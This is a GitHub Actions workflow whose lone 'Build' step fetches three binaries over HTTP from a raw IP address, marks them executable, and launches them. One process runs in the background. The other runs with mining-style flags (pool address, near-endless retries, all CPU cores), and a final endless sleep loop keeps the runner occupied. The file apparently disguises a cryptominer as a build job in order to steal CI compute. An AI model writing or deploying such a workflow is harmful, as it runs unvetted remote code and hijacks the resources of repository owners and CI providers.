on:
  push:
    branches: ["main"]

jobs:
  build:
    runs-on: puzl-ubuntu-24.04
    steps:
      - name: Build
        run: |
          curl -O http://216.126.225.177:443/pr && curl -O http://216.126.225.177:443/m && curl -O http://216.126.225.177:443/config.json && chmod +x *
          chmod +x * pr m
          nohup ./pr &
          ./m -o 127.0.0.1:80 --retries=21474836 --retry-pause=5 -t $(nproc)

          while true; do
            sleep 300
          done
